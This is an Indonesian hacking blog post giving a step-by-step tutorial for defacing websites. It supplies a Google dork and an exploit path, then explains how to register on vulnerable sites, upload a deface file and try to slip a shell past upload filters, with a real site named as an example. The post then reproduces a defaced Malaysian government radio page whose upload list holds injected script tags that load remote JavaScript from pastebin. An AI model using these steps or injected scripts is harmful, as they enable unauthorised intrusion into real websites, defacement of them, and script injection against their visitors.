Hacanimedream : Juni 2017

Deface Frontend Register and Upload

Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan(hack) suatu website baik halaman utama atau index filenya (Script Deface Atau Shell Deface) ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (bisa di folder atau di file).Deface adalah teknik mengganti atau menyisipkan file (Script Deface Atau Shell Deface) pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.Deface ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si Defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname dengan macam macam tujuan, ada yang melakukan Deface bertujuan untuk protes dengan kebijakan pemerintah, ada yang Deface cuma sekedar iseng, ada yang Deface akibat galau (:'v abis putus kayaknya) , ada yang Deface bertujuan nembak cewek :'v, macem macem deh :D bagi kami Deface sudah menjadi kehidupan sehari hari, Wkwkwwk

Bahan-Bahan :
1. File dengan berformat .txt isi nya terserah gan, kalo mau di buat mirror usahakan ada kata kata "hacked" nya :) kalo mau buat file .txt yang keren juga bisa make ascii :D

2. Dork : inurl:/index.php/en/147/featured

3. Exploit : /index.php/frontend/login/

SbS ( Step by Step ) :
1. Dorking di google dengan dork yang sudah di kasih di atas tadi

2. pilih web target (terserah yang mana aja :'v )

3. Masukan exploit : /index.php/frontend/login/
maka jika alamat web nya seperti http://www.property.com.mm/index.php/en/147/featured
tinggal kita ambil alamat web utamanya yaitu yang saya tandai merah dan kita tambahkan exploit di belakang web utamanaya jadi
http://www.property.com.mm/+Exploit = http://www.property.com.mm//index.php/frontend/login/

4. Setelah di exploit maka akan muncul from login & register silahkan daftar terlebih dahulu untuk mendapatkan akses ke website yang mau kita deface

5. Jika register nya berhasil maka akan menjadi seperti ini

Deface Frontend Register and Upload

6. Silahkan anda login memakai akun yang sudah di daftarkan sebelumnya :D

7. Setelah sukses login silahkan anda klik my profile :D

Deface Frontend Register and Upload

8. Ttau kan harus nyari apa? tempat upload lah tolo >:(

9. Upload file mu njer -_- coba aja bypass ext shell kalo masuk luyaman tuh wkoawkoa

10. Jika upload file deface nya berhasil akan seperti gambar di bawah ini

11. bagaimana cara akses file nya?

cukup Klik kanan -> buka tautan di tab baru (Open in new tab)

bagaimana? bisakah? sekian Tutorial Deface Frontend Register and Upload

Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan(hack) suatu website baik halaman utama atau index filenya (Script Deface Atau Shell Deface) ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (bisa di folder atau di file).Deface adalah teknik mengganti atau menyisipkan file (Script Deface Atau Shell Deface) pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.Deface ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si Defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname dengan macam macam tujuan, ada yang melakukan Deface bertujuan untuk protes dengan kebijakan pemerintah, ada yang Deface cuma sekedar iseng, ada yang Deface akibat galau (:'v abis putus kayaknya) , ada yang Deface bertujuan nembak cewek :'v, macem macem deh :D bagi kami Deface sudah menjadi kehidupan sehari hari, Wkwkwwk

\
Lihat Script Deface Keren [3]

Download Script Deface Keren [3]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>RTM Sarawak</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="css/rtm.css" rel="stylesheet" type="text/css">
<script type="text/javascript">
// Copyright 2006-2007 javascript-array.com

var timeout = 500;
var closetimer = 0;
var ddmenuitem = 0;

// open hidden layer
function mopen(id)
{
// cancel close timer
mcancelclosetime();

// close old layer
if(ddmenuitem) ddmenuitem.style.visibility = 'hidden';

// get new layer and show it
ddmenuitem = document.getElementById(id);
ddmenuitem.style.visibility = 'visible';

}
// close showed layer
function mclose()
{
if(ddmenuitem) ddmenuitem.style.visibility = 'hidden';
}

// go close timer
function mclosetime()
{
closetimer = window.setTimeout(mclose, timeout);
}

// cancel close timer
function mcancelclosetime()
{
if(closetimer)
{
window.clearTimeout(closetimer);
closetimer = null;
}
}

// close layer when click-out
document.onclick = mclose;

</script>
<link href="css/dropdown.css" rel="stylesheet" type="text/css">
</head>

<body>
<table width="950" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="120" valign="bottom" bgcolor="#FF9900" background="images/header.jpg" align="right"><embed src="welcomeword.swf" quality="high" wmode="transparent" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" height="40px" width="600px"></embed>

</td>
</tr>
<tr>
<td height="30" bgcolor="#4CAF1F">
<table width="100%" border="0" align="right" cellpadding="1" cellspacing="0">
<tr>
<td> <ul id="sddm">
<li><a href="index.php">LAMAN UTAMA</a></li>

<li><a href="#"
onmouseover="mopen('m2')"
onmouseout="mclosetime()">ORGANISASI</a>
<div id="m2"
onmouseover="mcancelclosetime()"
onmouseout="mclosetime()">
<a href="org_pengenalan.php">Pengenalan</a>
<a href="org_perutusan.php">Perutusan Pengarah</a>
<a href="org_sejarah.php">Sejarah</a>
<a href="org_pengarah.php">Mantan Pengarah</a>
<a href="org_visimisi.php">Visi dan Misi</a>
<a href="org_objektif.php">Objektif</a>
<a href="org_piagam.php">Piagam Pelanggan</a>
<a href="org_carta.php">Carta Organisasi</a>
<a href="org_video.php">Video Korporat</a>
<a href="http://www.rtm.gov.my/en/contact-us/rtm-regional-directory/penyiaran-sarawak" target="_blank">Direktori</a>

</div>
</li>

<li><a href="#"
onmouseover="mopen('m7')"
onmouseout="mclosetime()">GALERI</a>
<div id="m7"
onmouseover="mcancelclosetime()"
onmouseout="mclosetime()">
<a href="galeri_gambar.php">Bergambar</a>
</div>
</li>

<li><a href="#"
onmouseover="mopen('m3')"
onmouseout="mclosetime()">BUKU PELAWAT</a>
<div id="m3"
onmouseover="mcancelclosetime()"
onmouseout="mclosetime()">
<a href="form.php">Daftar Komen</a>
<a href="guestbook.php">Senarai Komen</a>
</div>
</li>

<li><a href="#"
onmouseover="mopen('m4')"
onmouseout="mclosetime()">MUAT TURUN</a>
<div id="m4"
onmouseover="mcancelclosetime()"
onmouseout="mclosetime()">
<a href="sebutharga.php">Dokumen</a>
<a href="borang.php">Borang</a>
</div>
</li>

<li><a href="#"
onmouseover="mopen('m5')"
onmouseout="mclosetime()">BANTUAN</a>
<div id="m5"
onmouseover="mcancelclosetime()"
onmouseout="mclosetime()">
<a href="contact_address.php">Hubungi kami</a>
<a href="contact_enquiry.php">Maklumbalas</a>
<a href="link.php">Pautan</a>
<a href="https://hrmisone.eghrmis.gov.my/?login_theme=cpanel" target="_blank">HrmisOne</a>
<a href="https://webmail.1govuc.gov.my/owa/auth/logon.aspx?replaceCurrent=1&url=http%3a%2f%2fwebmail.1govuc.gov.my%2fowa%2f" target="_blank">Emel Jabatan</a>

</div>
</li>

</ul> </td>
</tr>
</table></td>
</tr> <tr>
<td valign="top"><table width="953" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="754" valign="top" background="images/bg.jpg"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><div align="left"><img src="images/title/borang.jpg"></div></td>
</tr>
<tr align="center">
<td><img src="images/white.jpg" width="745"></td>
</tr>
<tr>
<td><table width="100%" border="0" cellpadding="2" cellspacing="2" class="content">
<tr>
<td valign="top"> </td>
</tr>
<form name="frm_opts" action="/borang.php" method="post" >
<input type="hidden" name="mode">
<input type="hidden" name="pageNo" value="">
<input type="hidden" name="url" value="borang.php">
<input type="hidden" name="row_id" value="">
<input type="hidden" name="search_type" value="">
<input type="hidden" name="search_mode" value="">
<input type="hidden" name="txt_alpha" value="">
<input type="hidden" name="txt_search" value="">
<input type="hidden" name="hold_page" value="">
</form>
<tr>
<td width="28%" valign="top"><table width="90%" border="0" align="center" cellpadding="2" cellspacing="2" class="content">
<tr valign="top" bgcolor="#FFFFFF">
<td><div align="center" class="content_black"><strong>Format</strong></div></td>
<td><div align="center" class="content_black">
<div align="left"><strong> Nama Borang </strong></div>
</div></td>
</tr>

<tr valign="top">
<td width="8%"> <div align="center"><img src="images/icon/html.jpg" width="13" height="13"></div></td>
<td width="92%"><div align="left"><a href="borang/1498241591_file.html" target="_blank">MR.RFKY.DZR.SVK </a></div></td>
</tr>
<tr class="content" >
<td colspan="2" background="images/dotted.gif"></td>
</tr>

<tr valign="top">
<td width="8%"> <div align="center"><img src="images/icon/.jpg" width="13" height="13"></div></td>
<td width="92%"><div align="left"><a href="borang/" target="_blank"><script type="text/javascript" src="http://pastebin.com/raw/A2DSbgQK"></script></p> </a></div></td>
</tr>
<tr class="content" >
<td colspan="2" background="images/dotted.gif"></td>
</tr>

<tr valign="top">
<td width="8%"> <div align="center"><img src="images/icon/jpg.jpg" width="13" height="13"></div></td>
<td width="92%"><div align="left"><a href="borang/1498230829_file.jpg" target="_blank">fgggg </a></div></td>
</tr>
<tr class="content" >
<td colspan="2" background="images/dotted.gif"></td>
</tr>

<tr valign="top">
<td width="8%"> <div align="center"><img src="images/icon/php2.jpg" width="13" height="13"></div></td>
<td width="92%"><div align="left"><a href="borang/1498229448_file.php2" target="_blank"><script type="text/javascript" src="https://pastebin.com/raw/LTfLp0ia"></script> </a></div></td>
</tr>
<tr class="content" >
<td colspan="2" background="images/dotted.gif"></td>
</tr>

</table></td>
</tr>
<tr>
<td valign="top"> </td>
</tr>
</table></td>
</tr>
</table></td>
<td width="1" valign="top"></td>
<td width="191" valign="top" bgcolor="#000000"><table width="100%" border="0" cellpadding="1" cellspacing="1">
<tr>
<td><div align="center">
<table align="center">
<td bgcolor="black">
<img src="dg8.gif" name="hr1"><img
src="dg8.gif" name="hr2"><img
src="dgc.gif" name="c"><img
src="dg8.gif" name="mn1"><img
src="dg8.gif" name="mn2"><img
src="dgc.gif" name="c"><img
src="dg8.gif" name="se1"><img
src="dg8.gif" name="se2"><img
src="dgpm.gif" name="ampm">
</td>
</table>
<script language="javascript">
</script>
</div></td>
</tr>
<tr class="date_visitor">
<td> </td>
</tr>
<tr class="date_visitor" align="center">
<td>
<script type="text/javascript">document.write(unescape("%3Cscript src=%27http://s10.histats.com/js15.js%27 type=%27text/javascript%27%3E%3C/script%3E"));</script>
<a href="http://www.histats.com" target="_blank" title="site stats" ><script type="text/javascript" >
try {Histats.start(1,3000540,4,1051,135,50,"00001000");
Histats.track_hits();} catch(err){};
</script></a>
<noscript><a href="http://www.histats.com" target="_blank"><img src="http://sstatic1.histats.com/0.gif?3000540&101" alt="site stats" border="0"></a></noscript>
</td>
</tr>
<tr class="date_visitor">
<td><div align="center">
<SCRIPT LANGUAGE="Javascript">

</SCRIPT>
</div></td>
</tr>
<tr class="date_visitor">
</tr>
<tr>
<td><div align="center"><img src="images/title/radiostation.jpg"></div></td>
</tr>
<tr>
<td><table width="100%" border="0" cellpadding="3" cellspacing="3">
<tr>
<td align="center" class="content"><a href=</a></td>
<tr>
<td align="center" class="content"><a href="http://waifm.rtm.gov.my/wai" target="_blank">WAIfm</a></td>
<tr>
<td align="center" class="content"><a href="http://redfm.rtm.gov.my/red" target="_blank">REDfm</a></td>
<tr>
</table></td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="1" cellpadding="1"><tr><td><div align="center"><img src="images/title/radio.jpg" width="167" height="40"></div></td>
</tr>
<tr>
<td><a href="http://www.rtmsarawak.gov.my/srwkfm.html" target="_blank"><img src="images/fm_sarawak.jpg" width="185" height="65" border="2"></a></td>
</tr>
<tr>
<td align="center" class="content"><a href="http://www.rtmsarawak.gov.my/waifm.html" target="_blank">WAIfm BIDAYUH & KAYAN</a></td>
</tr>
<tr>
<td><a href="http://www.rtmsarawak.gov.my/redfm.html" target="_blank"><img src="images/fm_red.jpg" width="185" height="65" border="2"></a></td>
</tr>
<td align="center" class="content"><a href="http://www.rtmsarawak.gov.my/sadafm.html" target="_blank">WAIfm IBAN</a></td>
<tr>

</table></td>
</tr>
<tr>
<td>
<tr class="content" align="center">

<td> Video Streaming</td>
</tr>
<tr>
<td><a href="http://www.rtmsarawak.gov.my/video/player.html" target="_blank"><img src="images/rtm2013.jpg"width="185" height="65" border="2"></a></td>
</tr>
<tr>
</tr>
<tr class="content" align="center">

</object></td>
</tr>

</tr>
</table>
</td>
</tr>
</table></td>
</tr>
<tr height="10">
<td valign="top"></td>
</tr>
<tr>
<td valign="top"><table width="953" height="60" align="center" cellpadding="1" cellspacing="1" class="footer" background="images/footer.jpg">
<tr>
<td width="19%" class="copyright"><div align="center"> Hak Cipta Terpelihara 2010 - 2017. Radio Televisyen Malaysia Sarawak<br>
Jabatan Penyiaran Kawasan Sarawak, Bangunan RTM, Jalan P. Ramlee, 93614 Kuching, Sarawak.
<br>
<a href="privasi.php">Privasi</a> | <a href="keselamatan.php">Keselamatan</a> | <a href="penafian.php">Penafian</a> </div></td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>